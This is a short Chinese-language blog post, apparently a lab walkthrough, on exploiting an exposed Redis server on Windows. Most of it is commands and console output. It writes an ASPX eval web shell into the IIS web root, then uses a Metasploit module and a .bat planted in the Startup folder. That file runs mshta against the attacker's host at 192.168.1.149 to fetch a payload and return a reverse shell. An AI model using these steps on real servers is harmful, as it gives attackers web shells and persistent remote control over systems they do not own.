点击上方“蓝字”带你去看小星星
使用redis客户端或者telnet连接redis服务器
⚡ root@kali redis/src ./redis-cli -h 192.168.1.124 -p 6379
或者
⚡ root@kali ~ telnet 192.168.1.124 6379
连接后输入info查看连接情况
利用方法:
1、写入webshell
⚡ root@kali redis/src ./redis-cli -h 192.168.1.124 -p 6379
192.168.1.124:6379> CONFIG SET dir C:/inetpub/wwwroot
OK
192.168.1.124:6379> CONFIG SET dbfilename evil.aspx
OK
192.168.1.124:6379> set webshell "<%eval request('x')%>"
OK
192.168.1.124:6379> save
2、反弹shell
首先加载这个脚本(PS_shell.rb):
msf5 > use exploit/windows/redis/PS_shell
msf5 exploit(windows/redis/PS_shell) > show options
Module options (exploit/windows/redis/PS_shell):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/redis/PS_shell) > set uri
set urihost set uripath set uriport
msf5 exploit(windows/redis/PS_shell) > set urip
set uripath set uriport
msf5 exploit(windows/redis/PS_shell) > set uripath 123456
uripath => 123456
msf5 exploit(windows/redis/PS_shell) > show options
Module options (exploit/windows/redis/PS_shell):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH 123456 no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/redis/PS_shell) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.149:4444
[*] Using URL: http://0.0.0.0:8080/123456
[*] Local IP: http://192.168.1.149:8080/123456
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.149:8080/123456"
msf5 exploit(windows/redis/PS_shell) >
然后在redis-cli下执行
192.168.1.131:6379> config set dir "C:/Users/liukaifeng01/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"
OK
192.168.1.131:6379> config set dbfilename 1.bat
OK
192.168.1.131:6379> config set dbfilename 1.bat
OK
192.168.1.131:6379> set x "\r\n\r\mshta.exe "http://192.168.1.149:8080/123456"\r\n\r\n"
Invalid argument(s)
192.168.1.131:6379> set x "\r\n\r\mshta http://192.168.1.149:8080/123456\rOK\r\n"
192.168.1.131:6379> save
OK
文件已经成功写入
我们这边手动重启靶机,就可以反弹一个shell了。
喜欢记得点赞关注哦^^